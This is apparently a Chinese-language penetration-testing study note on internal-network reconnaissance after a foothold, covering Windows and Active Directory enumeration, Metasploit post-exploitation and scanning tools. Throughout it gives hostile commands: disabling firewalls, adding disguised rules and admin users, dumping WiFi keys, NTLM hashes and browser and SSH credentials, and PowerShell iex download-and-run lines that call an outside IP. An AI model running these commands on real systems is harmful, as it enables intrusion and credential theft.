02.渗透测试内网信息收集
|
内网信息收集,渗透测试
|
764

3766 字
|
1.1 小时
本文最后更新于487 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com

一、工作组信息收集

1.用户信息

获取主机所有用户信息,收集用户列表及用户权限,不同的用户权限

#查看本机用户列表
net user

#获取本地管理员信息
net localgroup administrators

#查看当前在线用户
quser
query user
query user || qwinsta

#查看当前用户在目标系统中的具体权限
whoami /all

#查看当前权限
whoami && whoami /priv

#查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILE
net localgroup

注意:如果在msf中出现乱码

Pasted image 20250209201420.png

使用命令:

chcp 65001

Pasted image 20250209201518.png

2.系统信息

#查询网络配置信息。进行IP地址段信息收集
ipconfig /all

#查询操作系统及软件信息
systeminfo /fo list
systeminfo | findstr "主机名"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

#查看当前系统版本
ver
wmic os list brief
wmic os get Caption,CSDVersion,OSArchitecture,Version

wmic /?   #/?类似于-h

#查看系统体系结构
echo %PROCESSOR_ARCHITECTURE%

#查询本机服务信息
wmic service list brief

#查看安装的软件的版本、路径等
wmic product get name, version
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"

#查询进程信息
tasklist
wmic process list brief

#查看启动程序信息
wmic startup get command,caption 

#查看计划任务
#win2000之前使用at
at
#win2000之后使用schtasks
schtasks /query /fo LIST /v(win10)
#PS:如果遇到资源无法加载问题,则是由于当前活动页码所致:更改活动页码为437:chcp 437

#查看主机开机时间
net statistics workstation

#列出或断开本地计算机与所连接的客户端的对话
net session

#查看本地可用凭据
cmdkey /l

#查看补丁列表
wmic qfe get hotfixid
systeminfo | findstr "KB"

#查看补丁的名称、描述、ID、安装时间等
wmic qfe get Caption,Description,HotFixID,InstalledOn

#查看本地密码策略
net accounts

#查看hosts文件
Windows:
type c:\Windows\system32\drivers\etc\hosts

#查看dns缓存
ipconfig /displaydns

3.网络信息

#查看本机所有的tcp,udp端口连接及其对应的pid
netstat -ano

#查看本机所有的tcp,udp端口连接,pid及其对应的发起程序,需要管理员权限
netstat -anob

#查看路由表和arp缓存
route print
arp -a

#查看本机共享列表和可访问的域共享列表 (445端口)
net share
wmic share get name,path,status

4.防火墙信息

#查看防火墙配置(netsh命令也可以用作端口转发)
netsh firewall show config
netsh advfirewall show allprofiles
powershell get-netfirewallrule

#关闭防火墙(Windows Server 2003 以前的版本)
netsh firewall set opmode disable 

#firewall命令已弃用,建议使用advfirewall命令
#查看配置规则
netsh advfirewall firewall show rule name=all

#关闭防火墙\开启防火墙(Windows Server 2003 以后的版本)
netsh advfirewall set allprofiles state off\on

#导出\导入配置文件
netsh advfirewall export\import xx.pol

#新建规则阻止TCP协议139端口
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block

#新建规则允许3389通过防火墙
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

#删除名为Remote Desktop的规则
netsh advfirewall firewall delete rule name=Remote Desktop

5.RDP远程桌面

#开启RDP
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

#关闭RDP
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

#查询并开启RDP服务的端口,返回一个十六进制的端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

6.获取杀软信息

  • 获取杀软名
WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
  • 获取杀软名和安装路径
WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
  • 常见的杀毒软件进程
tasklist /v

wmic process list brief
进程 软件名称
360SD.exe 360杀毒
360TRAY.exe 360实时保护
HipsMain.exe 火绒
ZHUDONGFANGYU.exe 360s主动防御
KSAFETRAY.exe 金山卫士
SAFEDOGUPDATECENTER.exe 服务器安全狗
MCAFEEMCSHIELD.exe MCAFEE
EGULEXE NoD32
AVP.exe 卡巴斯基
AVGUARD.exe 小红伞
BDAGENT.exe BITDEFENDER
QQPCRTP.exe QQ电脑管家
hids 主机防护类产品
hws* 护卫神
yunsuo* 云锁
D_Safe* D盾

7.代理信息

REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer

#通过pac文件自动代理情况
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL

8.Wifi密码

  • 显示所有无线网络配置文件
netsh wlan show profile
  • 显示特定无线网络的密码(需要管理员权限)
netsh wlan show profile name="HUAWEI-MINGY" key=clear

Pasted image 20250209224526.png

  • 一条命令获取连接过的 wifi 密码,企业认证的获取不到
for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do @echo %j | findstr -i -v echo |  netsh wlan show profiles %j key=clear

9.回收站信息

  • 遍历当前系统中的所有用户账户,并将每个用户的回收站中的文件列表导出到文本文件中
FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:\$Recycle.Bin\%d\ ^>%c.txt
  • 目录路径在 C:\$Recycle.Bin
$I 开头的文件保存的是路径信息
$R 开头的文件保存的是文件内容

10.WMIC收集信息

:: BIOS信息
wmic BIOS list full /format:htable > wmic.html
:: CPU信息
wmic CPU list full /format:htable >> wmic.html
:: 启动配置管理
wmic BOOTCONFIG list full /format:htable >> wmic.html
:: 系统环境管理
wmic ENVIRONMENT list /format:htable >> wmic.html
:: 系统帐户管理
wmic SYSACCOUNT list full /format:htable >> wmic.html
:: 共享资源管理
wmic SHARE list full /format:htable >> wmic.html
:: 进程
wmic PROCESS get CSName,Description,ExecutablePath,ProcessId /format:htable >> wmic.html
:: 服务
wmic SERVICE get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:htable >> wmic.html
:: 用户帐号
wmic USERACCOUNT list full /format:htable >> wmic.html
:: 用户组
wmic GROUP list /format:htable >> wmic.html
:: 网络接口
wmic NICCONFIG where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:htable >> wmic.html
:: 硬盘信息
wmic VOLUME get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:htable >> wmic.html
:: 网络共享信息
wmic NETUSE list full /format:htable >> wmic.html
:: 安装的Windows补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:htable >> wmic.html
:: 启动运行程序
wmic STARTUP get Caption,Command,Location,User /format:htable >> wmic.html
:: 安装的软件列表
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:htable >> wmic.html
:: 操作系统
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,ServicePackMinorVersion,SystemDirectory /format:htable >> wmic.html
:: 时区信息
wmic Timezone get DaylightName,Description,StandardName /format:htable >> wmic.html

11.Powershell收集信息

使用PowerSploit

二、域内信息收集

1.Net

#查询域
net view /domain

#查询域内的所有计算机
net view /domain:mingy

#查询域内所有用户组 (Enterprise Admins 组权限最大)
net group /domain

#查看域管理员的用户组
net group "domain admins" /domain

#查询所有域成员计算机列表
net group "domain computers" /domain

#查询域系统管理员用户组
net group "Enterprise admins" /domain

#查看域控制器
net group "domain controllers" /domain

#对比查看 "工作站域 DNS 名称(域名)"和"登录域()域控制器"的信息是否相匹配
net config workstation

#查看域内所有账号
net user /domain

#查询指定用户的详情信息
net user xxx /domain

#查看时间可以找到域控
net time /domain

#查看域密码策略
net accounts /domain

#查看当前登录域
net config workstation

#登录本机的域管理员
net localgroup administrators /domain

2.Dsquery

dsquery 是一个 Windows 命令行工具,它是 Active Directory 服务的一部分,用于查询 Active Directory 目录服务。这个工具可以帮助系统管理员和IT专业人员检索有关目录对象的信息,例如用户、组、计算机和OU(组织单位)。

#查看当前域内的所有机器 ,dsquery 工具一般在域控上才有,不过你可以上传一个dsquery
dsquery computer

#查看当前域中的所有账户名
dsquery user

#查找具有特定通用名称(Common Name, CN)的用户
dsquery user -limit 0 "cn=用户名"

#查看当前域内的所有组名
dsquery group

#查看所有组织单位
dsquery ou

#查看到当前域所在的网段 ,结合 nbtscan 使用
dsquery subnet

#查看域内所有的web站点
dsquery site

#查看所有域控制器
dsquery server

#查询前240个以admin开头的用户名
dsquery user domainroot -name admin* -limit 240

3.Other

# 查看域控制器的机器名
# nltest 是一个用于诊断域信任和信任关系的命令行工具。
nltest /DCLIST:MINGY

# 查看域内的主域控制器(仅限Windows Server 2008及之后系统)
# netdom 是一个用于管理域信任和计算机账户的命令行工具。
netdom query pdc

# 查看域控主机名,列出所有配置为LDAP服务的服务器
# nslookup 是一个用于查询DNS记录的命令行工具。
# -type=srv 参数指定查询类型为服务记录(Service Record)
# _ldap._tcp 是LDAP服务的DNS服务记录标识
nslookup -type=srv _ldap._tcp

# 查看当前域与其他域的信任关系列表
nltest /domain_trusts

# 查看域内邮件服务器
# -q=mx 参数指定查询类型为邮件交换记录(Mail Exchange Record)
nslookup -q=mx mingy.com

# 查看域内DNS服务器
# -q=ns 参数指定查询类型为域名服务器记录(Name Server Record)。
nslookup -q=ns mingy.com

4.定位域控

  1. ipconfig
    使用 ipconfig 命令获取本地网络接口的详细信息,包括DNS服务器地址
ipconfig /all
  1. 查询 dns 解析记录
  • 利用 nslookup 工具查询域的LDAP服务记录(SRV记录),以识别域控制器
  • 此命令将返回域控制器的DNS记录,包括优先级、权重、端口号和目标主机名。
nslookup -type=all _ldap._tcp.dc._msdcs.mingy.com
  1. 服务主体名称(SPN)查询
  • 通过 setspn 工具查询所有服务主体名称,以识别域控制器。
setspn -q */*
  • 针对特定域执行SPN查询,可以过滤出域控制器相关的记录。
setspn -T mingy.com -q */*
  • 在 SPN 扫描结果中可以通过如下内容,来进行域控的定位。
CN =DC,OU=Domain Controllers,DC=mingy,DC=com
  1. net group
  • 使用 net group 命令查询域控制器组,直接定位域控制器的成员。
net group "domain controllers" /domain
  1. 端口识别
    识别域控制器开放的特定端口
  • 端口:389
  • 服务:LDAP、ILS
  • 说明:轻型目录访问协议和 NetMeeting Internet Locator Server 共用这一端口。
  • 端口:53
  • 服务:Domain Name Server(DNS)
  • 说明:53 端口为 DNS(Domain Name Server,域名服务器)服务器所开放。

三、Metasploit内网信息收集

1.反弹shell

应该知道如何做

2.关闭防火墙

1)meterpreter 进入 shell 执行如下命令

netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles

2)通过策略添加防火墙规则隐蔽行为

netsh advfirewall set add rule name="VMWARE" protocol=TCP dir=in localport=5555 action=allow

netsh firewall add portopening TCP 5555 "VMWARE" ENABLE ALL

3)重启系统,添加的防火墙规则才会生效

shutdown -r -f -t 0

3.打开3389并连接

#开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

#可以利用该命令 ,在目标机器上添加用户
run getgui -u admin -p admin
net localgroup administrators admin /add

#远程连接桌面
rdesktop -u username -p password ip

#查看远程桌面
screenshot
use espia
screengrab
screenshare

#删除指定账号
run post/windows/manage/delete_user USERNAME=admin

4.口令破解

用于从目标 Windows 系统中提取用户密码哈希值(NTLM hashes)。

# 在system权限的meterpreter中执行
use post/windows/gather/hashdump
set session 1
exploit
# 结果保存在tmp目录下

use post/windows/gather/smart_hashdump
set session 1
exploit

#格式
用户名称 : RID : LM-HASH 值 :  NT-HASH 值

#Hashdump使用的是mimikatz的部分功能
Load mimikatz

#wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp
mimikatz_command -h
mimikatz_command -f a::   #查询有哪些模块
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey

5.Other

#确定目标主机是否是虚拟机 :
run post/windows/gather/checkvm

#获取目标主机上的软件安装信息 :
run post/windows/gather/enum_applications

#获取目标主机上最近访问过的文档 、链接信息:
run  post/windows/gather/dumplinks

#查看目标环境信息:
run post/multi/gather/env

#查看firefox中存储的账号密码 :
run post/multi/gather/firefox_creds

#查看ssh账号密码的密文信息 ,证书信息:
run post/multi/gather/ssh_creds

# 查看目标系统所有网络流量并且进行数据包记录:
# -i 指定记录数据包的网卡
run packetrecorder -i 0    

#读取目标主机IE浏览器cookies等缓存信息 ,嗅探目标主机登录过的各类账号密码:
run post/windows/gather/enum_ie

#获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf4/loot/目录下

6.Winenum

winenum 模块是一个多功能的枚举工具,它可以帮助渗透测试人员快速收集目标系统的关键信息,为进一步的分析和攻 击提供基础数据。使用这个模块可以大大减少手动信息收集的时间和复杂性。

run winenum

/root/.msf4/logs/scripts/winenum

7.主机发现

[[01.Metasploit渗透框架#2.MSF 主机发现]]
模块路径:modules/auxiliary/scanner/discovery/

search aux /scanner/discovery

Pasted image 20250210163319.png

arp_sweep:使用 ARP 请求枚举本地局域网中的所有活跃主机
udp_sweep:通过发送 UDP 数据包探查指定主机是否活跃,并发现主机上的 UDP 服务。

模块使用应该知道的,使用options查看选项

8.端口扫描

[[01.Metasploit渗透框架#4.MSF 端口扫描]]
模块路径:modules/auxiliary/scanner/portscan/

search scanner/portscan

Pasted image 20250210163540.png

  • auxiliary/scanner/protscan/tcp
    通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢
  • auxiliary/scanner/protscan/ack
    通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
  • auxiliary/scanner/protscan/syn
    使用发送TCP SYN标志的方式探测开放端口
  • auxiliary/scanner/protscan/ftpbounce
    通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很好的防范此攻击,但在旧的系统上仍可以被利用
  • auxiliary/scanner/protscan/xmas
    一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤

一般情况下推荐使用 syn 端口扫描器,速度较快,结果准确,不易被对方察觉

9.服务扫描

[[01.Metasploit渗透框架#3.MSF 服务扫描]]

四、内网主机存活探测

1.Netbios 协议探测

1)NetBIOS简介

NetBIOS(Network Basic Input/Output System)是一种应用程序接口(API),由 IBM 开发,用于简化小型到中型局域 网内的程序间通信。NetBIOS 提供了一组统一的命令集,使得应用程序能够请求网络服务和资源访问。NetBIOS 名称可以利用多种解析机制,包括 Windows Internet Name Service (WINS)、广播和 Lmhosts 文件,将计算机名称解析为 IP 地 址,实现网络通信和资源共享。

2)使用Nmap进行NetBIOS扫描

nmap -sU -T4 --script nbstat.nse -p137 10.10.10.0/24

此命令使用 UDP 扫描(-sU),指定脚本 nbstat.nse 来获取 NetBIOS 统计信息,并且只扫描端口 137。

3)MSF扫描

msf6 > use auxiliary/scanner/netbios/nbname

4)Nbtscan

Nbtscan 是一个命令行工具,用于扫描开放的 NetBIOS 名称服务器。它可以在 Windows 和 Linux 系统上运 行,并且能够输出 IP 地址、机器名、域名称以及开启的服务列表。

  • Windows
nbtscan.exe -m 10.10.10.0/24

nbtstat -n
  • Linux
nbtscan -r 10.10.10.0/24

2.ICMP 协议探测

1)ICMP协议简介

ICMP是TCP/IP协议族中用于在IP网络传递控制信息和差错报告的协议,具有差错报告、诊断及网络控制等功能,通过在IP数据包中封装消息头部不同字段值来工作,常用于网络故障排查与性能测试,但也存在被用于DDoS攻击、ICMP隧道绕过安全设备等安全问题。(比如ping)

2)CMD下扫描内网C段存活主机

  • 使用 for 循环结合 ping 命令快速检测内网中存活的主机
for /l %i in (1,1,255) do @ ping 10.0.0.%i -w 1 -n 1|find /i "ttl="
  • 将存活主机和不存活主机的 IP 地址分别输出到不同的文件中,以便于后续分析
@for /l %i in (1,1,255) do @ping -n 1 -w 40 10.10.10.%i & if errorlevel 1 (echo 10.10.10.%i>>c:\a.txt) else (echo 10.10.10.%i >>c:\b.txt)

3)NMAP扫描

  • 使用 Nmap 的 ICMP 扫描选项来探测整个 C 段内存活的主机。
nmap -sn -PE -T4 10.10.10.0/24
  • -sn 表示不进行端口扫描,仅进行主机发现。
  • -PE 使用 ICMP echo 请求进行 ping 扫描。

4)Powershell扫描

  • 使用 PowerShell 脚本进行 ICMP 探测,可以指定起始和结束地址,以及要扫描的端口。
  • 本地加载
powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐ResolveHost ‐ScanPort ‐Port 445,135"
  • 远程加载
powershell iex(new-object net.webclient).downloadstring('http://47.104.255.11:8000/Invoke-TSPingSweep.ps1');Invoke-TSPingSweep -StartAddress 10.10.10.1 -EndAddress 10.10.10.254 -ResolveHost -ScanPort -Port 445,135

3.UDP 协议探测

1)UDP 简介

UDP(User Datagram Protocol)是一种在 IP 层之上提供简单传输服务的传输层协议。UDP 不像 TCP 那样提供数据包排 序、确认或重传机制。也就是说,当报文发送之后,是无法得知其是否安全完整到达的,适用于对实时性要求高或对数据准确性要求不高的场景。

2)使用 Nmap 进行 UDP 扫描

nmap -sU –T4 -sV --max-retries 1 192.168.1.100 -p500
  • -sU 指定 UDP 扫描。
  • -T4 调整扫描速度。
  • –max-retries 1 限制重试次数以减少网络干扰。
  • -p500 指定扫描 UDP 端口 500。

3)使用 Metasploit 进行 UDP 探测

  • 这些模块可以发送 UDP 数据包来探测目标网络中的活跃主机。
msf > use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweep

4)Unicornscan 扫描

Unicornscan是一个强大的开源网络扫描工具,它支持多种高级扫描技术,包括但不限于TCP、UDP、ICMP和其他自定义 协议的扫描。在 Linux 下推荐使用。

unicornscan -mU 192.168.1.100

4.ARP 协议探测

1)ARP 简介

ARP通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据 IP 地址获取物理地址的一个 TCP/IP 协议。主机发送信息时将包含目标 IP 地址的 ARP 请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址(MAC地址)。

2)NMAP 扫描

nmap -sn -PR 192.168.1.1/24

3)MSF 扫描

msf > use auxiliary/scanner/discovery/arp_sweep

4)Netdiscover

Netdiscover是一种网络扫描工具,通过 ARP 扫描发现活动主机,可以通过主动和被动两种模式进行 ARP 扫描。通过 主动发送 ARP 请求检查网络 ARP 流量,通过自动扫描模式扫描网络地址。
在kali中执行

netdiscover -r 10.10.10.0/24 -i eth1

5)Powershell

使用 PowerShell 进行 ARP 扫描 Invoke-ARPScan.ps1

powershell.exe -exec bypass -Command "Import-Module .\arpscan.ps1;InvokeARPScan -CIDR 192.168.1.0/24"

Pasted image 20250210211910.png

6)arp-scan(linux)

arp-scan 是一个用于 ARP 扫描的命令行工具,它可以快速扫描局域网内的活动主机:

arp-scan -interface=eth1 --localnet

7)arp-scan(windows)

arp-scan.exe –t 10.10.10.0/24

5.SMB 协议探测

1)SMB 协议简介

SMB(Server Message Block)协议是一种网络文件共享协议,广泛用于Windows网络环境中。它允许应用程序在网络中的计算机上访问文件、打印服务和串行端口。SMB 协议也经历了多个版本的更新,包括SMBv1、SMBv2和SMBv3。

2)NMAP

Nmap 可以利用脚本对SMB服务进行详细的探测,例如枚举共享

nmap ‐sU ‐sS ‐‐script smb‐enum‐shares.nse ‐p 445 192.168.1.119

3)Crackmapexec(好用)

CrackMapExec 是一个用于执行网络身份验证的Python工具,可以对SMB服务进行探测

# 默认为 100 线程
crackmapexec smb 10.10.10.0/24

4)MSF

此模块可以检测目标主机上运行的SMB协议版本。

Msf5 > use auxiliary/scanner/smb/smb_version

6.域内端口探测

1)MSF 中的 portscan 模块

2)Nishang 中的 Invoke-PortScan 模块

  • 端口扫描,默认扫描常见端口,也可以用 -Port 指定端口:
powershell iex(new-object net.webclient).downloadstring('http://47.104.255.11:8000/Invoke-PortScan.ps1');Invoke-PortScan -StartAddress 10.10.10.1 -EndAddress 10.10.10.255 -ResolveHost -ScanPort

五、内网信息收集工具

1.Fscan

  • 简介:
    一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡 信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能。
  • 使用:
# 默认使用全部模块
fscan.exe -h 192.168.1.1/24

# B 段扫描
fscan.exe -h 192.168.1.1/16

2.LadonGo

  • 简介:
    LadonGO 4.2 Pentest Scanner framework 全平台 Go 开源内网渗透扫描器框架,Windows/Linux/Mac 内网渗透,使用它 可轻松一键批量探测 C 段、B 段、A 段存活主机、高危漏洞检测 MS17010、SmbGhost,远程执行 SSH/Winrm,密码爆 破 SMB/SSH/FTP/Mysql/Mssql/Oracle/Winrm/HttpBasic/Redis,端口扫描服务识别 PortScan 指纹识 别/HttpBanner/HttpTitle/TcpBanner/Weblogic/Oxid 多网卡主机,端口扫描服务识别 PortScan。
  • 使用:
#多协议探测存活主机 (IP、机器名、MAC 地址、制造商)
Ladon 192.168.1.8/24 OnlinePC

#多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan

#扫描存活主机-
Ladon 192.168.1.8/24 OnlineIP

#ICMP扫描存活主机
Ladon 192.168.1.8/24 Ping

#扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010

#SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost

3.Adfind

  • 简介:
    Adfind 是一款在域环境下非常强大的信息搜集工具,允许用户在域环境下轻松搜集各种信息。 它提供了大量的选项,可以优化搜索并返回相关详细信息,是内网域渗透中的一款利器。
  • 使用:
Usage:
 AdFind [switches] [-b basedn] [-f filter] [attr list]

   basedn        RFC 2253 DN to base search from. If no base specified, defaults to default NC.
                 Base DN can also be specified as a SID, GUID, or IID.
   filter        RFC 2254 LDAP filter. If no filter specified, defaults to objectclass=*.
   attr list     List of specific attributes to return, 
                 if nothing specified returns 'default' attributes, aka * set.

  Switches: (designated by - or /)

    [CONNECTION OPTIONS][连接选项]
   -h host:port  要使用的主机和端口。如果未指定,则使用默认 LDAP 服务器上的端口 389。
                 Localhost 可以指定为“.”; 还可以通过-p 和-gc 指定端口。
                 指定了带端口的 IPv6 [address]:port
   -gc           搜索全局目录 (port 3268)。
   -p port       指定要连接到的端口的备用方法。

    [QUERY OPTIONS][查询选项]
   -s scope      搜索范围。 Base, One[Level], Sub[tree].
   -t xxx        查询的超时值,默认为 120 秒。

    [OUTPUT OPTIONS][输出选项]
   -c            仅对象计数。
   -dn           仅对象 DN。
   -appver       输出 AdFind 版本信息。

4.BloodHound

1)安装

apt install neo4j -y

2)收集器

3)启动

(1)启动 neo4j

neo4j start
neo4j console

(2)登录 neo4j

neo4j
neo4j1

各个版本Windows系统中自带的.NET Framework版本_framework4.0是windows几的-CSDN博客
找到目标win的版本,查找上面的对照表net版本是多少

Pasted image 20250211151153.png

Pasted image 20250211151216.png

再在课件中找到适用的收集器版本,将exe程序放到目标机器中运行,获得信息压缩包

Pasted image 20250211150935.png

将压缩包上传到kali中将文件拖入Bloodhound中,即可进行分析

Pasted image 20250211150457.png

文末附加内容
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
01.约束委派攻击

							
							

							
Brute4Road

							
							

							
Tsclient

							
							

							
04.应用程序提权

							
							

							
03.域内权限提升

							
							

							
Initial

							
							

							
05.docker未授权访问

							
							

							
02.渗透测试框架提权

							
							

							
01.操作系统提权

							
							

							
05.HTTP代理隧道